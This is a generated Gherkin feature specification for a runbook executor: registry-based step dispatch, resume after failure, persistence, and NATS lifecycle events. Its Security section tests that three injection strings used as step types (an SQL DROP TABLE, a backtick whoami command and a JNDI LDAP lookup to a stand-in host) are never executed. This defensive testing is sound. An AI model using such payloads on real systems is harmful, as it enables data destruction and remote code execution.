# Generated by /feature-spec
# Feature: Runbook Executor
# Stack: python
# Assumptions: 9 (see runbook-executor_assumptions.yaml)
# Generated: 2026-06-21T17:37:33Z
#
# Scope: the dispatch-by-step-type execution loop over a persisted Runbook (from
# the Runbook and Step Persistence feature). For each step the executor resolves
# a handler via a step-type registry, runs it, persists the result + status, and
# advances the resume pointer; on failure it stops and a later run re-enters at
# the failed step index (no restart). Lifecycle events runbook-started /
# step-started / step-result / runbook-complete / escalated are announced reusing
# the pipeline_publisher envelope pattern (fire-and-forget; a publish failure is
# logged but never rolls back persisted state). The executor has NO knowledge of
# step internals — registry indirection only. CLI entry: `forge runbook run
# <path-to-runbook-json>`. Unit scenarios use in-memory fake handlers and need no
# subprocess or NATS broker; one @integration @slow scenario publishes to a real
# NATS broker.

@runbook-executor
Feature: Runbook Executor
  As the Forge output-side loop
  I want to execute a persisted runbook step by step, dispatching each step to
  its registered handler and announcing lifecycle events as it goes
  So that a build's steps run to completion, survive failure by resuming from
  where they stopped, and emit an observable event stream

  Background:
    Given a runbook executor configured with a step-type registry and a lifecycle event stream

  # ───────────────────────────────────────────────────────────────────────────
  # GROUP A — Key Examples
  # ───────────────────────────────────────────────────────────────────────────

  # Why: Core dispatch loop — every step runs in order through its handler to completion
  @task:TASK-RBX-004
  @key-example @smoke
  Scenario: Executing a runbook runs each step in sequence to completion
    Given a persisted runbook with three steps that each have a registered handler
    When the executor runs the runbook
    Then each step's handler should run exactly once
    And the steps should run in their sequence order
    And the runbook should complete successfully

  # Why: Registry indirection — a step's handler is chosen solely by its step type
  # [ASSUMPTION: confidence=medium] A handler reports an outcome the executor maps to passed/failed/awaiting_approval; the executor never inspects handler internals.
  @task:TASK-RBX-001
  @key-example
  Scenario: Each step is dispatched to the handler registered for its step type
    Given a persisted runbook whose steps declare distinct step types
    And each of those step types has a handler registered
    When the executor runs the runbook
    Then each step should be handled by the handler registered for its step type

  # Why: Persistence side-effect — a step's status and result are recorded as it runs
  @task:TASK-RBX-004
  @key-example @smoke
  Scenario: A completed step has its status and result persisted
    Given a persisted runbook with a single step whose handler succeeds
    When the executor runs the runbook
    Then the step should be recorded as passed
    And the step's result should be persisted

  # Why: Resume pointer advances past each completed step so progress is durable
  # [ASSUMPTION: confidence=low] On success the resume pointer comes to rest beyond the final step to mark completion; this must be reconciled with the persistence feature's open ASSUM-004 (advancing past the final step is refused).
  @task:TASK-RBX-004
  @key-example
  Scenario: The resume pointer advances as each step completes
    Given a persisted runbook with three steps whose handlers all succeed
    When the executor runs the runbook
    Then the resume pointer should advance past each step as it completes
    And the resume pointer should come to rest beyond the final step

  # Why: Lifecycle event stream — the full happy-path sequence of announcements
  @task:TASK-RBX-004
  @key-example @smoke
  Scenario: The executor announces the runbook lifecycle from start to completion
    Given a persisted runbook with two steps whose handlers succeed
    When the executor runs the runbook
    Then a runbook-started event should be announced once
    And a step-started and then a step-result event should be announced for each step in order
    And a runbook-complete event should be announced once

  # Why: CLI entry — a runbook on disk is loaded and executed from the command line
  # [ASSUMPTION: confidence=medium] `forge runbook run <path>` reads the JSON, persists the runbook in the store, then executes it so results and the pointer have a durable home.
  @task:TASK-RBX-005
  @key-example @smoke
  Scenario: Running a runbook from the command line loads and executes it
    Given a runbook saved as a runbook file on disk
    When I run the runbook from the command line by giving its file path
    Then the runbook should be loaded from the file
    And its steps should be executed in their sequence order
    And the command should report that the runbook completed

  # ───────────────────────────────────────────────────────────────────────────
  # GROUP B — Boundary Conditions
  # ───────────────────────────────────────────────────────────────────────────

  # Why: Just-inside smallest — the minimal runbook has exactly one step
  @task:TASK-RBX-004
  @boundary
  Scenario: A runbook with a single step runs that step and completes
    Given a persisted runbook with exactly one step whose handler succeeds
    When the executor runs the runbook
    Then the single step's handler should run exactly once
    And the runbook should complete successfully

  # Why: Resume boundary — re-entry at the final step runs only that step
  @task:TASK-RBX-004
  @boundary
  Scenario: A runbook resumed at its final step runs only the final step
    Given a persisted runbook of three steps whose first two steps have already passed
    And whose resume pointer rests on the final step
    When the executor runs the runbook
    Then only the final step's handler should run
    And the earlier steps' handlers should not run again
    And the runbook should complete successfully

  # Why: Just-outside boundary — a fully completed runbook has nothing left to run
  # [ASSUMPTION: confidence=low] Re-running an already-complete runbook is a no-op that reports it as already complete, not an error.
  @task:TASK-RBX-004
  @boundary
  Scenario: A runbook whose steps have all passed completes without running any handler
    Given a persisted runbook all of whose steps have already passed
    And whose resume pointer rests beyond the final step
    When the executor runs the runbook
    Then no step handler should run
    And the runbook should be reported as already complete

  # Why: Just-outside boundary — a runbook with no steps cannot be executed
  # [ASSUMPTION: confidence=medium] An empty runbook is refused before execution, consistent with the persistence layer refusing empty runbooks.
  @task:TASK-RBX-004
  @boundary @negative
  Scenario: A runbook with no steps is refused before execution
    Given a runbook with an empty step list
    When the executor is asked to run the runbook
    Then the run should be refused as having nothing to execute
    And no lifecycle events should be announced

  # ───────────────────────────────────────────────────────────────────────────
  # GROUP C — Negative Cases
  # ───────────────────────────────────────────────────────────────────────────

  # Why: Unknown step type — a step with no registered handler cannot be run
  # [ASSUMPTION: confidence=medium] A step whose step type has no registered handler stops the run and escalates rather than crashing.
  @task:TASK-RBX-004
  @negative
  Scenario: A step whose step type has no registered handler stops the run and escalates
    Given a persisted runbook one of whose steps declares a step type with no registered handler
    When the executor runs the runbook
    Then the run should stop at that step
    And an escalation should be announced
    And that step should not be recorded as passed

  # Why: Missing input — the command line is given a path with no runbook file
  @task:TASK-RBX-005
  @negative
  Scenario: Running from the command line with a missing runbook file reports a clear error
    Given no runbook file exists at a given path
    When I run the runbook from the command line by giving that path
    Then the command should report that the runbook file could not be found
    And no runbook should be executed

  # Why: Malformed input — the command line is given a file that is not a valid runbook
  @task:TASK-RBX-005
  @negative
  Scenario: Running from the command line with an invalid runbook file reports a clear error
    Given a runbook file whose contents are not a valid runbook
    When I run the runbook from the command line by giving its file path
    Then the command should report that the runbook file is invalid
    And no steps should be executed

  # ───────────────────────────────────────────────────────────────────────────
  # GROUP D — Edge Cases
  # ───────────────────────────────────────────────────────────────────────────

  # Why: Stop-on-failure — a failing step halts the run and leaves later steps untouched
  # [ASSUMPTION: confidence=medium] A failing step stops the run and announces an escalated event; failure is one of the two escalation triggers.
  @task:TASK-RBX-004
  @edge-case
  Scenario: A failing step stops the run without running later steps
    Given a persisted runbook of three steps whose second step's handler fails
    When the executor runs the runbook
    Then the first step should be recorded as passed
    And the second step should be recorded as failed
    And the third step's handler should not run
    And the run should stop

  # Why: Stop-and-resume — re-running re-enters at the failed step and does not restart
  @task:TASK-RBX-004
  @edge-case
  Scenario: After a failure, re-running resumes at the failed step without restarting
    Given a runbook whose first step is recorded as passed and whose second step failed on a previous run
    And whose second step now has a handler that succeeds
    When the executor runs the runbook again
    Then the first step's handler should not run again
    And the run should resume at the second step
    And the second and remaining steps should run to completion

  # Why: Failure escalates rather than silently completing the runbook
  @task:TASK-RBX-004
  @edge-case
  Scenario: A failing step escalates and the runbook is not announced complete
    Given a persisted runbook whose only step's handler fails
    When the executor runs the runbook
    Then an escalation should be announced
    And no runbook-complete event should be announced

  # Why: Pointer integrity — the resume pointer never advances past a step that failed
  @task:TASK-RBX-004
  @edge-case
  Scenario: The resume pointer rests on the failed step after a failure
    Given a persisted runbook whose second step's handler fails
    When the executor runs the runbook
    Then the resume pointer should rest on the second step
    And re-running the runbook should resume at the second step

  # Why: Crash recovery — a run interrupted after a step commits resumes at the next step
  @task:TASK-RBX-004
  @edge-case
  Scenario: A run interrupted after a step completes resumes at the next step
    Given a persisted runbook whose first step completed and was persisted before the run was interrupted
    When the executor runs the runbook again
    Then the first step's handler should not run again
    And the run should resume at the second step

  # Why: Open-closed via the registry — a brand-new step type needs only a handler registered
  @task:TASK-RBX-001
  @edge-case
  Scenario: A step type the executor has never seen is handled by registering a handler
    Given a step type the executor has no built-in knowledge of
    And a handler registered for that step type
    When the executor runs a runbook containing a step of that type
    Then the step should be handled by the newly registered handler
    And the executor should need no knowledge of that step type beyond the registry

  # Why: Each step-result announcement reports that step's actual outcome
  @task:TASK-RBX-004
  @edge-case
  Scenario: The step-result announcement reports the outcome of each step
    Given a persisted runbook whose first step passes and whose second step fails
    When the executor runs the runbook
    Then the step-result for the first step should report success
    And the step-result for the second step should report failure

  # Why: Event publishing is fire-and-forget — a publish failure must not lose persisted progress
  # [ASSUMPTION: confidence=high] Reuses the pipeline_publisher rule: a publish failure is logged but never rolls back persisted step state and never stops the run.
  @task:TASK-RBX-004
  @edge-case
  Scenario: A failure to announce events does not roll back persisted progress
    Given the lifecycle event stream is failing to accept announcements
    When the executor runs a runbook whose steps all succeed
    Then every step should still run and be persisted
    And the runbook should still complete
    And the announcement failures should not roll back the persisted progress

  # ───────────────────────────────────────────────────────────────────────────
  # GROUP E — Security
  # ───────────────────────────────────────────────────────────────────────────

  # Why: A step type is only ever a registry lookup key — adversarial text is never executed
  @task:TASK-RBX-006
  @edge-case @negative
  Scenario Outline: An adversarial step type with no handler is escalated, never executed
    Given a persisted runbook whose single step declares the step type "<step_type>"
    And no handler is registered for that step type
    When the executor runs the runbook
    Then the run should stop at that step
    And an escalation should be announced
    And the step type should be treated only as a lookup key, never executed

    Examples:
      | step_type             |
      | run; DROP TABLE steps |
      | exec`whoami`          |
      | ${jndi:ldap://evil}   |

  # Why: A handler that throws unexpectedly is contained — the executor fails the step, it does not crash
  @task:TASK-RBX-006
  @edge-case
  Scenario: A handler that raises an unexpected error is contained as a step failure
    Given a persisted runbook of two steps whose first step's handler raises an unexpected error
    When the executor runs the runbook
    Then the first step should be recorded as failed
    And an escalation should be announced
    And the second step's handler should not run
    And the executor should stop cleanly rather than crash

  # ───────────────────────────────────────────────────────────────────────────
  # GROUP F — Concurrency
  # ───────────────────────────────────────────────────────────────────────────

  # Why: Two executors on the same runbook must not double-run a step — committed progress serialises them
  @task:TASK-RBX-007
  @edge-case
  Scenario: Two executors running the same runbook do not run the same step twice
    Given a persisted runbook with three steps whose handlers succeed
    And two executors are asked to run that same runbook at the same time
    When both executors run the runbook
    Then each step's handler should run exactly once across both executors
    And the runbook should complete successfully
    And neither executor should re-run a step the other has already completed

  # ───────────────────────────────────────────────────────────────────────────
  # GROUP G — Data Integrity
  # ───────────────────────────────────────────────────────────────────────────

  # Why: Resume relies on persisted state, not the event stream — a lost announcement must not lose progress
  @task:TASK-RBX-006
  @edge-case
  Scenario: Persisted step state is the source of truth for resume, not the event stream
    Given a persisted runbook whose first step passed and was persisted but whose step-result announcement was lost
    When the executor runs the runbook again
    Then the first step's handler should not run again
    And the run should resume at the second step

  # Why: The result must commit before the pointer advances, so a crash in the gap never skips a step
  @task:TASK-RBX-006
  @edge-case
  Scenario: A step result is committed before the resume pointer advances past it
    Given a persisted runbook whose first step's handler succeeds
    And the run is interrupted after the first step's result is persisted but before the pointer advances
    When the executor runs the runbook again
    Then the run should resume at the first step or the second step but never skip the first step's result
    And no step should be left advanced past without its result persisted

  # ───────────────────────────────────────────────────────────────────────────
  # GROUP H — Integration Boundaries
  # ───────────────────────────────────────────────────────────────────────────

  # Why: Gate-as-data — a step awaiting approval pauses the run and escalates; later steps do not run
  # [ASSUMPTION: confidence=low] A step that resolves to awaiting-approval pauses the run and escalates rather than failing or being skipped.
  @task:TASK-RBX-004
  @edge-case
  Scenario: A step that requires approval pauses the run and escalates
    Given a persisted runbook of three steps whose second step resolves to awaiting approval
    When the executor runs the runbook
    Then the first step should be recorded as passed
    And the run should pause at the second step
    And an escalation should be announced
    And the third step's handler should not run

  # Why: Real-broker proof — lifecycle events reach an actual NATS subscriber on the wire
  @task:TASK-RBX-007
  @edge-case @integration @slow
  Scenario: Lifecycle events are published to a real NATS broker and observed by a subscriber
    Given a real NATS broker is available
    And a subscriber is listening for this runbook's lifecycle events
    And a persisted runbook with two steps whose handlers succeed
    When the executor runs the runbook against the real broker
    Then the subscriber should observe a runbook-started event
    And a step-started and a step-result event for each step in order
    And a runbook-complete event
